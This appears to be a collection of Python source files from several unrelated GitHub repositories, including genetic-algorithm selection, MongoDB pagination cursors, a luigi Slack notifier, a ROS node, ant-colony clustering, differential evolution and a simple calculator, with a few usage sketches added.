{
"source": "jefersoncmn/Genetic-Algorithm",
"score": 3
}
|
#### File: Genetic-Algorithm/src/leituraDeArquivo.py
```python
import pandas as pd
import json
def ler_json(arq_json):
with open(arq_json, 'r', encoding='utf8') as f:
return json.load(f)
def ler_materia_no_json(json_data, line):
materia = json_data[line]
return materia
def ler_dado_da_materia_no_json(json_data, line, key):
dado = json_data[line][key]
return dado
```
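A minimal usage sketch of the helpers above; the file name and keys (`materias.json`, `"nome"`) are illustrative assumptions, not taken from the repository:
```python
dados = ler_json("materias.json")                      # hypothetical JSON file: a list of course objects
primeira = ler_materia_no_json(dados, 0)               # first course entry
nome = ler_dado_da_materia_no_json(dados, 0, "nome")   # one field of that entry
print(primeira, nome)
```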
#### File: Genetic-Algorithm/src/metodoDeSelecao.py
```python
import random
from modelos.individuo import Individuo
from modelos.materia import Materia
# In tournament selection, three individuals are drawn at random and the two with
# the highest fitness are chosen to have their genes propagated. In truncation
# selection, the threshold value used was 0.4, i.e. only the best 40% of the
# individuals can be selected to take part in the next stages.
# geracao = list of all individuals in the generation
def selecao_por_truncamento(geracao : Individuo, valor_do_limiar : float) -> Individuo:
valor = regra_de_tres(len(geracao), valor_do_limiar*100)
#print("valor de itens de acordo com a limiar "+str(valor_do_limiar)+" quantidade: "+str(valor))
return retornar_maiores_fitness(geracao, valor)
def selecao_por_torneio(geracao : Individuo, quantidade_de_selecionados : int, quantidade_de_genes_propagados : int):
lista_de_individuos_selecionados_no_torneio : Individuo = []
while len(lista_de_individuos_selecionados_no_torneio) < 300:
lista_de_individuos_selecionados : Individuo = []
for individuo in range(len(geracao)):
random.seed()
if len(lista_de_individuos_selecionados) <= quantidade_de_selecionados:
if random.randint(0,1) == 0:
lista_de_individuos_selecionados.append(geracao[individuo])
lista_de_individuos_selecionados_no_torneio.extend(retornar_maiores_fitness(lista_de_individuos_selecionados, quantidade_de_genes_propagados))
return lista_de_individuos_selecionados_no_torneio
def retornar_maiores_fitness(geracao : Individuo, quantidade_a_ser_retornada : int) -> Individuo:
maiores_valores : Individuo = []
maior_valor : Individuo
for x in range(quantidade_a_ser_retornada):
maior_valor = geracao[0]
for individuo in range(len(geracao)):
if maior_valor.fitness < geracao[individuo].fitness:
maior_valor = geracao[individuo]
maiores_valores.append(maior_valor)
geracao.remove(maior_valor)
return maiores_valores
def atribuir_fitness_a_geracao(geracao : Individuo):
for individuo in range(len(geracao)): # iterate over the individuals
atribuir_fitness(geracao[individuo])
return geracao
def atribuir_fitness(individuo : Individuo):
punicoes : int = 0
for materia in range(len(individuo.lista_de_materias)):
punicoes += individuo.lista_de_materias[materia].punicao
#print("materia: "+individuo.lista_de_materias[materia].nome+" tem punicao de: "+ str(individuo.lista_de_materias[materia].punicao))
individuo.fitness = calcular_fitness(punicoes)
def calcular_fitness(punicao : int) -> float:
return 100/(100 + punicao)
def regra_de_tres(quantidade : int, porcentagem : int) -> int:
return int((quantidade*porcentagem)/100)
```
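A quick sanity check of the fitness and truncation helpers above (a sketch using only the functions defined in this file): a total penalty of 25 yields fitness 100 / (100 + 25) = 0.8, and a 0.4 threshold over a population of 50 keeps the best 20.
```python
print(calcular_fitness(0))            # 1.0 (no constraint violated)
print(calcular_fitness(25))           # 0.8
print(regra_de_tres(50, 0.4 * 100))   # 20 individuals pass the truncation threshold
```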
#### File: src/modelos/individuo.py
```python
from modelos.materia import Materia
class Individuo:
id : int
lista_de_materias : Materia = []
fitness : float
# Violated constraints
sobreposicao_de_aulas : int = 0
dependencias_desordenadas : int = 0
conflito_de_horario_de_professor : int = 0
def __init__(self, id : int , lista_de_materias : Materia):
self.id = id
self.lista_de_materias = lista_de_materias
```
|
{
"source": "jefersondaniel/phoopy",
"score": 2
}
|
#### File: phoopy/test/test_init.py
```python
class TestInit(object):
def test_init(self):
assert 1 == True
```
|
{
"source": "jefersondaniel/pydantic-mongo",
"score": 2
}
|
#### File: pydantic-mongo/pydantic_mongo/pagination.py
```python
from .errors import PaginationError
from base64 import b64decode, b64encode
from bson import ObjectId
from pydantic import BaseModel
from pydantic.generics import GenericModel
from typing import Generic, TypeVar, Any, List
import bson
import zlib
DataT = TypeVar('DataT')
class Edge(GenericModel, Generic[DataT]):
node: DataT
cursor: str
class Config:
json_encoders = {ObjectId: str}
def encode_pagination_cursor(data: List) -> str:
byte_data = bson.BSON.encode({'v': data})
byte_data = zlib.compress(byte_data, 9)
return b64encode(byte_data).decode('utf-8')
def decode_pagination_cursor(data: str) -> List:
try:
byte_data = b64decode(data.encode('utf-8'))
byte_data = zlib.decompress(byte_data)
result = bson.BSON(byte_data).decode()
return result['v']
except Exception:
raise PaginationError('Invalid cursor')
def get_pagination_cursor_payload(model: BaseModel, keys: List[str]) -> List[Any]:
model_dict = model.dict()
model_dict['_id'] = model_dict['id']
return [
__evaluate_dot_notation(model_dict, key) for key in keys
]
def __evaluate_dot_notation(data: Any, path: str):
pieces = path.split('.')
if len(pieces) == 1:
return data[path]
current_data = data
for piece in pieces:
if isinstance(current_data, list) or isinstance(current_data, tuple):
current_data = current_data[int(piece)]
else:
current_data = current_data[piece]
return current_data
```
#### File: pydantic-mongo/test/test_pagination.py
```python
import datetime
from bson import ObjectId
from pydantic_mongo.pagination import encode_pagination_cursor, decode_pagination_cursor, get_pagination_cursor_payload
from pydantic import BaseModel
from typing import List
class Foo(BaseModel):
count: int
size: float = None
class Bar(BaseModel):
apple = 'x'
banana = 'y'
class Spam(BaseModel):
id: str = None
foo: Foo
bars: List[Bar]
class Config:
json_encoders = {ObjectId: str}
class TestPagination:
def test_get_pagination_cursor_payload(self):
spam = Spam(id='lala', foo=Foo(count=1, size=1.0), bars=[Bar()])
values = get_pagination_cursor_payload(spam, ['_id', 'id'])
assert values[0] == 'lala'
assert values[1] == 'lala'
values = get_pagination_cursor_payload(spam, ['foo.count'])
assert values[0] == 1
values = get_pagination_cursor_payload(spam, ['bars.0.apple'])
assert values[0] == 'x'
def test_cursor_encoding(self):
old_value = [ObjectId('611b158adec89d18984b7d90'), 'a', 1]
cursor = encode_pagination_cursor(old_value)
new_value = decode_pagination_cursor(cursor)
assert old_value == new_value
```
|
{
"source": "jefersongrandi/luigi-slack",
"score": 2
}
|
#### File: luigi-slack/luigi_slack/api.py
```python
import os
import logging
import inspect
from contextlib import contextmanager
from collections import defaultdict
import luigi
from luigi_slack.slack_api import SlackAPI
from luigi_slack.events import SUCCESS
from luigi_slack.events import MISSING
from luigi_slack.events import FAILURE
from luigi_slack.events import START
from luigi_slack.events import PROCESSING_TIME
from luigi_slack.events import event_label
log = logging.getLogger('luigi_slack')
log.setLevel(logging.DEBUG)
class SlackMessage(object):
def __init__(self, title=None, fields={}, success=None):
self.title = title
self.fields = fields
self.success = success
class SlackBot(object):
def __init__(self,
token,
channels=[],
events=[FAILURE],
max_events=5,
username='Luigi-slack Bot',
as_user=False,
use_private_channels=True,
task_representation=str,
print_env=[]):
if not isinstance(events, list):
raise ValueError('events must be a list, {} given'.format(type(events)))
if not channels:
log.info('SlackBot(channels=[]): notifications are not sent')
self.events = events
self._events_to_handle = self.events + [SUCCESS, START]
self.client = SlackAPI(token, username, as_user, use_private_channels=use_private_channels)
self.channels = channels
self.max_events = max_events
self.event_queue = defaultdict(list)
self.task_repr = task_representation
self._print_env = print_env
def send_notification(self):
message = self._format_message()
post_to = self.channels
if message:
self.client.bulk_message(message, post_to)
return True
def set_handlers(self):
self._init_handlers()
for event in self._events_to_handle:
if event not in self._event_handlers:
raise ValueError("{} is not a valid event type".format(event))
handler = self._event_handlers[event]['luigi_handler']
function = self._event_handlers[event]['function']
luigi.Task.event_handler(handler)(function)
return True
def _init_handlers(self):
self._event_handlers = {
SUCCESS: {
'luigi_handler': luigi.Event.SUCCESS,
'function': self._success
},
FAILURE: {
'luigi_handler': luigi.Event.FAILURE,
'function': self._failure
},
START: {
'luigi_handler': luigi.Event.START,
'function': self._start
},
MISSING: {
'luigi_handler': luigi.Event.DEPENDENCY_MISSING,
'function': self._missing
},
PROCESSING_TIME: {
'luigi_handler': luigi.Event.PROCESSING_TIME,
'function': self._processing_time
}
}
def _success(self, task):
task = self.task_repr(task)
self.event_queue[FAILURE] = [fail for fail in self.event_queue[FAILURE] if task != fail['task']]
self.event_queue[MISSING] = [miss for miss in self.event_queue[MISSING] if task != miss]
self.event_queue[SUCCESS].append(task)
def _failure(self, task, exception):
task = self.task_repr(task)
failure = {'task': task, 'exception': str(exception)}
self.event_queue[FAILURE].append(failure)
def _missing(self, task):
task = self.task_repr(task)
self.event_queue[MISSING].append(task)
def _start(self, task):
task = self.task_repr(task)
self.event_queue[START].append(task)
def _processing_time(self, task):
raise NotImplementedError
# task = self.task_repr(task)
# self.event_queue[PROCESSING_TIME].append(task)
def _format_message(self):
job = os.path.basename(inspect.stack()[-1][1])
title = "*Status report for {}*".format(job)
if self._only_success():
if SUCCESS in self.events:
messages = {event_label(SUCCESS): ["Job ran successfully!"]}
success = True
else:
return None
else:
messages = self._event_messages()
success = False
if self._print_env:
env_to_print = ["{}={}".format(env_var, os.environ.get(env_var, ''))
for env_var in self._print_env]
messages['Environment'] = env_to_print
return SlackMessage(title=title, fields=messages, success=success)
def _only_success(self):
return len(self.event_queue[SUCCESS]) == len(self.event_queue[START])
def _event_messages(self):
messages = {}
for event_type in self.events:
if event_type in self.event_queue:
label = event_label(event_type)
if not self.event_queue[event_type]:
messages[label] = ['none']
elif len(self.event_queue[event_type]) > self.max_events:
messages[label] = ["more than {} events, check logs.".format(self.max_events)]
else:
messages[label] = []
for event in self.event_queue[event_type]:
try:
# only "failure" is a dict
msg = "Task: {}; Exception: {}".format(event['task'], event['exception'])
messages[label].append("Task: {}; Exception: {}".format(event['task'], event['exception']))
except TypeError:
# all the other events are str
messages[label].append(event)
return messages
@contextmanager
def notify(slacker):
slacker.set_handlers()
yield
slacker.send_notification()
```
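For context, a minimal usage sketch of the `notify` context manager above; the token, channel, and `MyTask` are illustrative assumptions, not taken from the repository:
```python
import luigi
from luigi_slack.api import SlackBot, notify, SUCCESS, FAILURE

class MyTask(luigi.Task):
    """Trivial stand-in task, only for illustration."""
    def run(self):
        pass

slacker = SlackBot(
    token="xoxb-your-token",        # hypothetical Slack token
    channels=["#data-pipelines"],   # hypothetical channel
    events=[SUCCESS, FAILURE],
)

with notify(slacker):
    # handlers are registered on entry; the summary message is sent on exit
    luigi.run(main_task_cls=MyTask, local_scheduler=True)
```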
|
{
"source": "jefersonjlima/robotics-codes",
"score": 3
}
|
#### File: temperature_sensor/script/app_node.py
```python
import rospy
from std_msgs.msg import Float64
class App:
def __init__(self):
rospy.init_node('py_app_node', anonymous=False)
rospy.Subscriber('sensor/value', Float64, self.update)
self.value = Float64()
def update(self, msg):
self.value.data = msg.data
rospy.loginfo(f"I heard: {self.value.data}")
def run(self):
rospy.spin()
if __name__ == "__main__":
try:
app = App()
app.run()
except rospy.ROSInterruptException:
pass
```
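A companion publisher sketch (assuming ROS 1 / rospy and the same `sensor/value` topic) that would feed the subscriber node above; the node name and values are illustrative:
```python
import rospy
from std_msgs.msg import Float64

def talker():
    rospy.init_node('py_sensor_node', anonymous=False)
    pub = rospy.Publisher('sensor/value', Float64, queue_size=10)
    rate = rospy.Rate(1)  # publish at 1 Hz
    value = 20.0
    while not rospy.is_shutdown():
        pub.publish(Float64(value))  # hypothetical temperature reading
        value += 0.1
        rate.sleep()

if __name__ == "__main__":
    try:
        talker()
    except rospy.ROSInterruptException:
        pass
```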
|
{
"source": "jefersonmontalvao/Sakurajima-BOT",
"score": 3
}
|
#### File: sakurajima/core/logger.py
```python
import logging
from sakurajima.conf import LOG_CONFIG
__all__ = ['get_logger']
# Define the basic logging configuration. Values are imported from the conf.settings.py file.
LEVELS = {'NOTSET', 'DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'}
FORMAT = LOG_CONFIG['FORMAT']
if (LEVEL := LOG_CONFIG['LEVEL'].upper()) in LEVELS:
# Set the log format and settings
logging.basicConfig(format=FORMAT, level=getattr(logging, LEVEL))
# Using a file as logger.
# logging.basicConfig(filename='debug.log', format=FORMAT, level=getattr(logging, LEVEL))
else:
raise ValueError('LOG_CONFIG value "%s" is invalid.' % LOG_CONFIG.get('LEVEL'))
# Simplified way to get logger.
def get_logger(name='default'):
"""Return the logger with name value automatically or editable by name param."""
# Note: locals() here does not contain '__name__', so the default case resolves to
# None and logging.getLogger(None) returns the root logger.
name = locals().get('__name__') if name == 'default' else name
return logging.getLogger(name)
```
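A short usage sketch; since the default name resolves to the root logger (see the note above), passing the caller's `__name__` explicitly is the reliable way to get a module-scoped logger:
```python
from sakurajima.core.logger import get_logger

log = get_logger(__name__)   # module-scoped logger
log.info("bot started")
log.debug("config loaded: %s", {"prefix": "!"})  # illustrative payload
```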
|
{
"source": "Jefersonnnn/tracing_qgis",
"score": 2
}
|
#### File: Jefersonnnn/tracing_qgis/tracing.py
```python
from qgis.PyQt.QtGui import *
from qgis.PyQt.QtWidgets import *
from qgis.core import (
Qgis,
QgsMessageLog,
QgsProject,
QgsApplication)
import os
from core.task_manager import TracingCAJ
class Tracing:
def __init__(self, iface):
# save reference to the QGIS interface
self.iface = iface
self.__pipeline = None
self.__valves = None
# Initialize plugin directory
self.__tm = QgsApplication.taskManager()
self.plugin_dir = os.path.dirname(__file__)
self.icon_folder = self.plugin_dir + os.sep + 'icons' + os.sep
def initGui(self):
# create action that will start plugin configuration
self._set_info_button()
self.action.setObjectName("TracingAction")
self.action.setStatusTip("Start tracing from selected pipeline")
self.action.triggered.connect(self.run)
# add toolbar button and menu item
self.iface.addToolBarIcon(self.action)
self.iface.addPluginToMenu("&Tracing plugins", self.action)
def unload(self):
# remove the plugin menu item and icon
self.iface.removePluginMenu("&Tracing plugins", self.action)
self.iface.removeToolBarIcon(self.action)
def run(self):
self.__pipeline = QgsProject.instance().mapLayersByName('pipelines_tracing')
self.__valves = QgsProject.instance().mapLayersByName('valves_tracing')
if len(self.__pipeline) > 0 and len(self.__valves) > 0:
pipeline_select = self.iface.activeLayer().selectedFeatures()
if pipeline_select:
if len(pipeline_select) == 1:
tracing_caj = TracingCAJ(self.__tm, self.__pipeline, self.__valves)
tracing_caj.start()
else:
self.iface.messageBar().pushMessage("Info",
"Select only ONE network to start", level=Qgis.Info)
print('Info - Select only ONE network to start')
else:
self.iface.messageBar().pushMessage("Info", 'Rename layers for "pipelines_tracing" and "valves_tracing" '
, level=Qgis.Info)
print('Rename layers for "pipelines_tracing" and "valves_tracing"')
def error(self):
self.iface.messageBar().pushMessage("Error occorred",
"Error",
level=Qgis.Critical)
QgsMessageLog.logMessage('Error occurred')
def _set_info_button(self):
""" Set main information button (always visible) """
icon_path = self.icon_folder + 'tracingcaj.png'
if os.path.exists(icon_path):
icon = QIcon(icon_path)
self.action = QAction(icon, "Start Tracing", self.iface.mainWindow())
else:
self.action = QAction("Start Tracing", self.iface.mainWindow())
# add toolbar button and menu item
self.iface.addToolBarIcon(self.action)
```
|
{
"source": "JefersonSMAlmeida/zdsync",
"score": 3
}
|
#### File: zdsync/zdsync/printer.py
```python
import math
import shutil
class Printer(object):
def __init__(self, synchronizer):
self._synchronizer = synchronizer
def output(self):
print(
"""The following {plural} only exist in the sandbox:
{}
The following {plural} only exist in production:
{}
The following {plural} are different between environments:
{}
There are {} other {plural} that are the same between environments.
""".format(
self.in_columns(self._synchronizer.only_in_sandbox),
self.in_columns(self._synchronizer.only_in_production),
self.in_columns(self._synchronizer.in_both_but_different),
len(
set(self._synchronizer.in_both).difference(
self._synchronizer.in_both_but_different
)
),
plural="{}s".format(self._synchronizer.api_object.__name__)
)
)
def in_columns(self, values):
if not values:
return ""
width = shutil.get_terminal_size().columns
max_size = max([len(str(value)) for value in values])
columns = max(
1,
min([math.floor(width / (max_size + 1)), len(values)])
)
column_width = math.floor(width / columns)
return "\n".join(
"".join(
[
str(value).ljust(column_width)
for value in values[start:start + columns]
]
)
for start in range(0, len(values), columns)
)
```
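A minimal sketch of how `Printer` could be driven; `Trigger` and `FakeSynchronizer` are hypothetical stand-ins (not part of zdsync) that only provide the attributes `output()` reads:
```python
class Trigger:  # stands in for a synced Zendesk object type
    pass

class FakeSynchronizer:  # minimal duck-typed synchronizer
    api_object = Trigger
    only_in_sandbox = ["trigger-a", "trigger-b"]
    only_in_production = ["trigger-c"]
    in_both = ["trigger-d", "trigger-e"]
    in_both_but_different = ["trigger-d"]

Printer(FakeSynchronizer()).output()
```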
|
{
"source": "jefersonsv/Thunder",
"score": 3
}
|
#### File: benchmarks/python3-flask/hello.py
```python
from flask import Flask
app = Flask(__name__)
import logging
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
@app.route("/hello")
def hello():
return "Hello from /hello"
```
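A quick way to exercise the route without starting a server, using Flask's built-in test client (sketch):
```python
with app.test_client() as client:
    response = client.get("/hello")
    print(response.status_code, response.get_data(as_text=True))  # 200 Hello from /hello
```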
|
{
"source": "JefersonTS/Algoritmos-em-Python",
"score": 4
}
|
#### File: JefersonTS/Algoritmos-em-Python/Calculadora.py
```python
print('\nEscolha uma das opcoes abaixo.\n')
print('A _ Calcular a tabuada de um número de 1 a 9;')
print('B _ Calcular o índice de massa corporal;')
print('C _ Calcular o fatorial de um número inteiro;')
print('D _ Descobrir o menor elemento de um vetor;')
print('E _ Obter a média dos elementos ímpares de um vetor de 20 posições.')
print('_'*70)
opc = ''
while(opc == ''):
opc = str(input('Informe sua opção: ')).lower().strip()
print(' ')
if(opc !='a' and opc !='b' and opc !='c' and opc !='d' and opc !='e'):
print('Informe uma opção válida.\n')
if(opc == 'a'):
def calcular_tabuada(_numero):
numero = int(_numero)
if(numero <= 0):
print('Informe um número inteiro entre 1 e 10.')
if(numero > 10):
print('Informe um número inteiro entre 1 e 9.')
if(numero >= 1 and numero <= 10):
for i in range(1,11):
print(i, "*", numero, "=", i * numero)
numero_escolhido = int(input('Informe o número: '))
print(' ')
enviar_tabuada = calcular_tabuada(numero_escolhido)
if(opc == 'b'):
def calcular_IMC(_peso,_altura):
def_peso = float(_peso)
def_altura = float(_altura)
IMC = def_peso/(def_altura**2) # BMI = weight / height squared
return IMC
peso = float(input('Informe o seu peso: '))
print(' ')
altura = float(input('Informe a sua altura: '))
print(' ')
dados_IMC = calcular_IMC(peso, altura)
print('O seu IMC é de {} \n'.format(dados_IMC))
if(opc == 'c'):
def calcular_fatorial(_numero):
numero = _numero
fatorial = 1
for i in range(1, numero + 1):
fatorial *= i
return fatorial
escolha_numero = int(input('Informe o número: '))
print(' ')
result = calcular_fatorial(escolha_numero)
print('O fatorial de {} e igual a {}'.format(escolha_numero, result))
print(' ')
if(opc == 'd'):
def menor_elemento(_vetor):
vetor = _vetor
menorvalor = min(vetor)
return menorvalor
tamanhovetor = int(input('Informe o tamanho do vetor: '))
print(' ')
vetor1 = []
for i in range(0, tamanhovetor):
vetor1.append(float(input('Informe o valor da {} posição do vetor: ' .format(i+1) )))
resultado = menor_elemento(vetor1)
print(' ')
print('O menor elemento do vetor é {} \n'.format(int(resultado)))
if(opc == 'e'):
def media_impar(total_impar, quantidade_impar):
totalimpar = total_impar
quantidadeimpar = quantidade_impar
mediaimpar = totalimpar/quantidadeimpar
return mediaimpar
vet = []
totimpar = 0
qtdimpar = 0
for i in range(0,20):
vet.append(int(input('Informe o valor da {} posição: '.format(i+1))))
for i in range(0, 20):
if(vet[i] % 2 == 1):
totimpar += vet[i]
qtdimpar += 1
print(' ')
media = media_impar(totimpar, qtdimpar)
print('A média dos elementos ímpares do vetor é de',media)
break
```
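For reference, a worked example of the corrected BMI formula used in option B (weight divided by height squared), with illustrative values:
```python
peso, altura = 70.0, 1.75     # 70 kg, 1.75 m (illustrative values)
imc = peso / altura ** 2
print(round(imc, 2))          # 22.86
```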
|
{
"source": "Jefesonk1/ACC",
"score": 3
}
|
#### File: Jefesonk1/ACC/new.py
```python
import numpy as np
import openpyxl
import math
import random as rd
def extractFromFile(filename,min_r,min_c,max_r,max_c):
book=openpyxl.load_workbook(filename)
sheet=book.active
data=[]
temp=[]
for row in sheet.iter_rows(min_row=min_r, min_col=min_c, max_row=max_r, max_col=max_c):
for cell in row:
temp.append(cell.value)
data.append(temp.copy())
temp.clear()
return data
def calcDist(data,x,y):
max_c=len(data[0])
z=0
for i in range(max_c):
z+=((data[x][i]-data[y][i])**2)
z=math.sqrt(z)
#print(z)
return z
def makeGrid(data):
index=[]
siz=len(data)
grid=np.full((math.floor(math.sqrt(10*siz)),math.floor(math.sqrt(10*siz))),-1)
#print(rd.randrange(0,22))
for i in range(siz):
while True:
a=rd.randrange(0,len(grid)-1)
b=rd.randrange(0,len(grid)-1)
if grid[a][b] == -1:
grid[a][b]=i
index.append([a,b])
break
return grid,index
def normalize(data):
lenx=len(data)
leny=len(data[0])
z=np.zeros((lenx,leny))
arrMax=np.zeros(leny)
arrMin=np.zeros(leny)
for j in range(leny):
i_max=np.argmax(data[:,j])
arrMax[j]=data[i_max][j]
i_min=np.argmin(data[:,j])
arrMin[j]=data[i_min][j]
for i in range(lenx):
for j in range(leny):
z[i][j]=(data[i][j]-arrMin[j])/(arrMax[j]-arrMin[j])
return z
def move(ant,grid,index,indexPos):
possibilities=[-1,0,1]
oldData=grid[ant[0],ant[1]]
oldPos=ant.copy()
c_ant=ant.copy()
while True:
x=possibilities[rd.randrange(0,3)]
y=possibilities[rd.randrange(0,3)]
c_ant[0]+=x
c_ant[1]+=y
c_ant=np.mod(c_ant, (len(grid),len(grid)))
if grid[c_ant[0],c_ant[1]]==-1:
grid[c_ant[0],c_ant[1]]=oldData
grid[oldPos[0],oldPos[1]]=-1
index[indexPos]=[c_ant[0],c_ant[1]]
return c_ant
def getNeighborhood(data,grid,x,y,s,alpha):
'''print('inicio{}'.format(grid[x][y]))
print('x{}'.format(x))
print('y{}'.format(y))'''
s=math.floor((s-1)/2)
y_s = y - s
x_s = x - s
total = 0.0
for i in range((s*2)+1):
xi = (x_s + i) % len(grid)
for j in range((s*2)+1):
if j != x and i != y:
yj = (y_s + j) % len(grid)
o = grid[xi][yj]
if o is not None and o !=-1 and grid[x,y]!=o:
'''print('\n')
print('valor coordenada passada{}'.format(grid[x,y]))
print('valor coordenada achada{}'.format(grid[xi,yj]))
print('\n')'''
dist=calcDist(data,grid[x,y],grid[xi,yj])/alpha
total+=(1-dist)
if (1/(s**2))*total>0:
return (1/(s**2))*total
else:
return 0
def pPick(data,grid,x,y,s,kp,alpha):
prob=np.random.sample()
if prob < (kp/(kp+getNeighborhood(data,grid,x,y,s,alpha)))**2:
return True
return False
def pDrop(data,grid,x,y,s,kd,alpha):
prob=np.random.sample()
if prob < ((getNeighborhood(data,grid,x,y,s,alpha))/(kd+(getNeighborhood(data,grid,x,y,s,alpha))))**2:
return True
return False
def ACC(data,kp,kd,alpha,s,its):
contador=0
index=[] # indices of the grid cells that contain data
z=normalize(data)
grid,index=makeGrid(z)
print(grid)
print('\n')
print(index)
indexPos=rd.randrange(0,len(index))
ant=index[indexPos]
while True:
ant=move(ant,grid,index,indexPos)
drop=pDrop(z,grid,ant[0],ant[1],s,kd,alpha)
#print(drop)
if drop:
pick=False
while not pick:
indexPos=rd.randrange(0,len(index))
ant=index[indexPos]
if pPick(z,grid,ant[0],ant[1],s,kp,alpha):
pick=True
contador+=1
if contador>=its:
break
print('\n')
print(grid)
print('\n')
print(index)
return grid
#print('\n')
def main():
filename="Dados Para Agrupamento.xlsx"
a=extractFromFile(filename,2,1,29,2)
b=extractFromFile(filename,2,3,29,6)
arr=np.asarray(b, dtype=np.float32)
kp=0.8
kd=0.3
alpha=0.5
s=3
its=500
jog=ACC(arr,kp,kd,alpha,s,its)
for i in range(len(jog)):
for j in range(len(jog)):
pass
for i in range(len(a)):
print('{} {} {}'.format(i,a[i][1], a[i][0]))
if __name__ == '__main__':
main()
```
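A small sanity-check sketch of the Lumer-Faieta style pick/drop rules used in `pPick` and `pDrop` above: a low neighbourhood similarity f makes picking an item likely and dropping it unlikely, and vice versa (kp = 0.8 and kd = 0.3 as in `main`):
```python
def p_pick(f, kp=0.8):
    return (kp / (kp + f)) ** 2

def p_drop(f, kd=0.3):
    return (f / (kd + f)) ** 2

for f in (0.0, 0.5, 2.0):
    print(f, round(p_pick(f), 3), round(p_drop(f), 3))
# f = 0.0 -> pick 1.0,   drop 0.0
# f = 2.0 -> pick ~0.08, drop ~0.76
```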
|
{
"source": "Jefesonk1/cNatural",
"score": 3
}
|
#### File: Jefesonk1/cNatural/trabalho12.py
```python
import numpy as np
import random as rd
import matplotlib.pyplot as plt
def zakh(n):
beg=0
a=sum([(x**2) for x in n])
c=0
b=0
size=len(n)
while beg<size:
b+=0.5*(beg+1)*n[beg]
c+=0.5*(beg+1)*n[beg]
beg+=1
return a+(b**2)+(c**4)
def cruzamento(old,NP,n,new):
U=np.zeros(shape=[NP,n])
print(U)
def DE(NP,CR,F,n,gen):
pop=np.zeros(shape=[NP,n])
for x in range(NP):
for y in range(n):
pop[x][y]=rd.uniform(-5, 10)
newpop=muta(pop,NP,n,F)
cruzamento(pop,NP,n,newpop)
def muta(pop,NP,n,F):
newpop=np.zeros(shape=[NP,n])
for x in range (NP):
result = rd.sample(range(0,NP-1),3)
newpop[x]=pop[result[0]]+F*(pop[result[1]]-pop[result[2]]) # DE mutation uses the difference of the two donor vectors
return newpop
def main():
DE(40,0.3,0.2,2,50)
if __name__ == '__main__':
main()
```
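The crossover step above is left unfinished, so the following is a self-contained sketch (under my own assumptions, not the author's implementation) of classic DE/rand/1/bin on the Zakharov function: mutation uses the difference of two randomly chosen vectors, binomial crossover mixes mutant and parent, and greedy selection keeps the better of trial and parent.
```python
import numpy as np
import random as rd

def zakharov(x):
    a = sum(v ** 2 for v in x)
    b = sum(0.5 * (i + 1) * v for i, v in enumerate(x))
    return a + b ** 2 + b ** 4

def de_rand_1_bin(NP=40, CR=0.3, F=0.5, n=2, gen=50):
    pop = np.random.uniform(-5, 10, size=(NP, n))
    fit = np.array([zakharov(ind) for ind in pop])
    for _ in range(gen):
        for i in range(NP):
            r1, r2, r3 = rd.sample([j for j in range(NP) if j != i], 3)
            mutant = pop[r1] + F * (pop[r2] - pop[r3])   # DE/rand/1 mutation
            cross = np.random.rand(n) < CR
            cross[rd.randrange(n)] = True                # keep at least one mutant gene
            trial = np.where(cross, mutant, pop[i])      # binomial crossover
            trial_fit = zakharov(trial)
            if trial_fit <= fit[i]:                      # greedy selection
                pop[i], fit[i] = trial, trial_fit
    return pop[np.argmin(fit)], float(fit.min())

best, best_fit = de_rand_1_bin()
print(best, best_fit)
```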
|
{
"source": "jeff00seattle/facebook-api-scripts",
"score": 3
}
|
#### File: scripts/py_sources/pandas_to_report.py
```python
import io
import pandas as pd
def df_nested_html_table(values):
if values == '':
return values
json_values = values
df_row_values = pd.io.json.json_normalize(json_values)
df_row_values = df_row_values.replace("\n", "", regex=True)
df_row_values = df_row_values.sort_values(df_row_values.columns[0], ascending=False)
html_row_table = df_row_values.to_html(index=False)
return html_row_table.replace('\n', '').replace('\r', '')
def df_nested_excel(values):
if values == '':
return values
json_values = values
df_row_values = pd.io.json.json_normalize(json_values)
df_row_values = df_row_values.replace("\n", "", regex=True)
df_row_values = df_row_values.sort_values(df_row_values.columns[0], ascending=False)
# to_excel() needs a path or writable buffer and returns None, so write to an
# in-memory buffer and return its bytes rather than calling .replace() on None.
excel_buffer = io.BytesIO()
df_row_values.to_excel(excel_buffer, index=False, float_format='%.2f')
return excel_buffer.getvalue()
```
|
{
"source": "jeff00seattle/logging-fortified",
"score": 2
}
|
#### File: pyfortified_logging/errors/errors_traceback.py
```python
import sys
import traceback
def get_exception_message(ex):
"""Build exception message with details.
"""
template = "{0}: {1!r}"
return template.format(type(ex).__name__, ex.args)
def print_traceback(ex):
exc_type, exc_value, exc_tb = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_tb)
def print_limited_traceback(ex, limit=1):
traceback.print_exc(limit=limit, file=sys.stdout)
def print_traceback_stack():
"""Provide traceback of provided exception.
"""
exception_list = traceback.format_stack()
exception_list = exception_list[:-2]
exception_list.extend(traceback.format_tb(sys.exc_info()[2]))
exception_list.extend(traceback.format_exception_only(sys.exc_info()[0], sys.exc_info()[1]))
exception_str = "Traceback (most recent call last):\n"
exception_str += "".join(exception_list)
# Removing the last \n
exception_str = exception_str[:-1]
print(exception_str)
```
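A minimal usage sketch of the helpers above:
```python
try:
    1 / 0
except ZeroDivisionError as ex:
    print(get_exception_message(ex))     # ZeroDivisionError: ('division by zero',)
    print_limited_traceback(ex, limit=1)
```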
|
{
"source": "jeff00seattle/matrix-transform",
"score": 3
}
|
#### File: jeff00seattle/matrix-transform/matrix_transform_A.py
```python
import sys
import getopt
import logging
import random
import string
import json
import copy
class JaggedMatrixGenerator(object):
"""Generate a Jagged Matrix and fill it with random characters as defined by available string sequences.
"""
SEQUENCE = ["ascii_letters", "ascii_lowercase", "ascii_uppercase",
"digits", "hexdigits", "octdigits", "printable", "punctuation",
"whitespace"]
@classmethod
def _sequence(cls, sequence):
assert sequence in cls.SEQUENCE
if "ascii_letters" == sequence:
return string.ascii_letters
if "ascii_lowercase" == sequence:
return string.ascii_lowercase
if "ascii_uppercase" == sequence:
return string.ascii_uppercase
if "digits" == sequence:
return string.digits
if "hexdigits" == sequence:
return string.hexdigits
if "octdigits" == sequence:
return string.octdigits
if "printable" == sequence:
return string.printable
if "punctuation" == sequence:
return string.punctuation
if "whitespace" == sequence:
return string.whitespace
@property
def matrix(self):
return self.__matrix
@matrix.setter
def matrix(self, value):
self.__matrix = value
#
# Initialize
#
def __init__(self, kw={}):
"""Initialize
"""
cls = self.__class__
self.matrix = None
self.row_length_min = kw.get("row-length-min", 4)
self.row_length_max = kw.get("row-length-max", 8)
